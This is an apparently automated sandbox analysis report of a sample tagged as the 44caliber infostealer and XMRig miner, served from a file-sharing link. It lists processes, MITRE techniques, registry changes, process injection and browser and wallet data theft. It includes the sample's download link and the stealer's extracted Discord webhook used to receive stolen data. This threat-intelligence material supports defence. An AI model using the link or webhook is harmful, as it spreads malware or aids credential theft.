44caliber | hxxps://dropmefiles[.]com/N84Xm

Resubmissions

19-11-2022 14:03

221119-rcrqsaec33 10

19-11-2022 09:25

221119-ldlm9sdg88 10

19-11-2022 09:24

221119-lc3kdshg9s 1

Analysis

max time kernel
293s
max time network
324s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
19-11-2022 09:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://dropmefiles.com/N84Xm

Score

10^/10

44caliber xmrig miner spyware stealer

Malware Config

Extracted

Family

44caliber

https://discord.com/api/webhooks/965618031504019487/Cn6AsCx4kQZK0LEEUQXsbtiZO7Ar6_aYAZNrXSTi1qiRB2vdvuWMLMYEB4YSSPKpEMtk

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2932-133-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-135-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-137-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-138-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-139-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-141-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-143-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-144-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-145-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-147-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-148-0x000000014030F3F8-mapping.dmp	xmrig
behavioral1/memory/2932-150-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-152-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2932-157-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 5 IoCs

Processes:

1.exewin.exeNixware Loader.exeservices64.exesihost64.exe

pid process

608 1.exe
2412 win.exe
2448 Nixware Loader.exe
2808 services64.exe
2916 sihost64.exe
Loads dropped DLL 8 IoCs

Processes:

nixware.execmd.execonhost.exe

pid process

2248 nixware.exe
2248 nixware.exe
2248 nixware.exe
2248 nixware.exe
1064 cmd.exe
1064 cmd.exe
2568 conhost.exe
2568 conhost.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

91 freegeoip.app
92 freegeoip.app
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

nixware.exe

pid process

2248 nixware.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 2568 set thread context of 2932 2568 conhost.exe svchost.exe

pid	process
608	1.exe
2412	win.exe
2448	Nixware Loader.exe
2808	services64.exe
2916	sihost64.exe

pid	process
2248	nixware.exe
2248	nixware.exe
2248	nixware.exe
2248	nixware.exe
1064	cmd.exe
1064	cmd.exe
2568	conhost.exe
2568	conhost.exe

flow	ioc
91	freegeoip.app
92	freegeoip.app

pid	process
2248	nixware.exe

description	pid	process	target process
PID 2568 set thread context of 2932	2568	conhost.exe	svchost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	1.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2256 schtasks.exe

pid	process
2256	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies Internet Explorer settings 1 TTPs 33 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 4070b6b101fcd801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000256ed27e8919d04f83812f84ee5c95da0000000002000000000010660000000100002000000019bf6cd3095c7e2c01f9267bc684dfaad1079700805190e423e4cc474d9db103000000000e80000000020000200000003bedf8fc7aa889a41e55d36aa9b640d4779ab182e7ce74c1a10bda471bc528ae200000006c898dfe0cd2a53833a0bcf6c09c2c114b6086251250243f0d91889a357cc7c04000000049606f095c208013cf535a0423ada4a3d432963cb215181b834fc075e040b8577dacc601affdac414a4a5bfcf4cdcec04d705d3bdc95b97aa3f802a2b71447d0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000256ed27e8919d04f83812f84ee5c95da000000000200000000001066000000010000200000001d726e197c60dc2a0d4f5aecf0cff292410059faa66c83e5c91cb264bc3bee25000000000e8000000002000020000000a044e2f8b39916423bd9b73d75100f9392b030dd44557d8db14253e7b4a74cf89000000025fb71c2118b6ecb1b33b5ef3a8278d8a534d5a3b13bb7a6156d8698f99d612fc1722d9ae087552458c82823796974a63feb9b0a90e998f4e2b4ba996fec9781570b2c767774490d44fd51809221ed3da9e98030d950d7aebbb8e01391e8c2cb824311a61808650c5ce0a4cf193387353fdfc9146a07b2f8e77b406c4c7ee1a633f2e0802ded29384ec1e69aba34d75340000000337d82fc875310f4adcf726337398e49f8c9863b052126fa839937824091b2ece567ac2bf820c4cabfe350a262fad73ae4a5069fdc81eba16edf2fd629531271	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D7C7AD31-67F4-11ED-BEDC-663367632C22} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exe1.execonhost.exechrome.exechrome.execonhost.exesvchost.exetaskmgr.exe

pid	process
1500	chrome.exe
1164	chrome.exe
1164	chrome.exe
2724	chrome.exe
1164	chrome.exe
1164	chrome.exe
2888	chrome.exe
608	1.exe
608	1.exe
608	1.exe
608	1.exe
1284	conhost.exe
1524	chrome.exe
2052	chrome.exe
2052	chrome.exe
2568	conhost.exe
2568	conhost.exe
2932	svchost.exe
2932	svchost.exe
2932	svchost.exe
2932	svchost.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
2932	svchost.exe
1148	taskmgr.exe
1148	taskmgr.exe
1148	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

1148 taskmgr.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
1148	taskmgr.exe

pid	process
460

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

AUDIODG.EXE1.execonhost.execonhost.exesvchost.exetaskmgr.exe

description	pid	process
Token: 33	2352	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2352	AUDIODG.EXE
Token: 33	2352	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2352	AUDIODG.EXE
Token: SeDebugPrivilege	608	1.exe
Token: SeDebugPrivilege	1284	conhost.exe
Token: SeDebugPrivilege	2568	conhost.exe
Token: SeLockMemoryPrivilege	2932	svchost.exe
Token: SeLockMemoryPrivilege	2932	svchost.exe
Token: SeDebugPrivilege	1148	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exe

pid	process
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

nixware.exeiexplore.exeIEXPLORE.EXE

pid process

2248 nixware.exe
2620 iexplore.exe
2620 iexplore.exe
1292 IEXPLORE.EXE
1292 IEXPLORE.EXE
1292 IEXPLORE.EXE
1292 IEXPLORE.EXE

pid	process
2248	nixware.exe
2620	iexplore.exe
2620	iexplore.exe
1292	IEXPLORE.EXE
1292	IEXPLORE.EXE
1292	IEXPLORE.EXE
1292	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1164 wrote to memory of 268	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 268	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 268	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1380	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1500	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1500	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1500	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe
PID 1164 wrote to memory of 1692	1164	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://dropmefiles.com/N84Xm
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6804f50,0x7fef6804f60,0x7fef6804f70
2⤵
PID:268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1140 /prefetch:2
2⤵
PID:1380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1296 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1788 /prefetch:8
2⤵
PID:1692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2080 /prefetch:1
2⤵
PID:1684

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2088 /prefetch:1
2⤵
PID:1084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
2⤵
PID:1108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3372 /prefetch:2
2⤵
PID:932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
2⤵
PID:1304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
2⤵
PID:2108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3732 /prefetch:8
2⤵
PID:2180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=540 /prefetch:8
2⤵
PID:2592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 /prefetch:8
2⤵
PID:2660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3340 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1080,12453261746902015279,17974187157610511201,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3316 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2888

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2232

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x51c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2500

C:\Users\Admin\Desktop\nixware.exe
"C:\Users\Admin\Desktop\nixware.exe"
1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2248

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
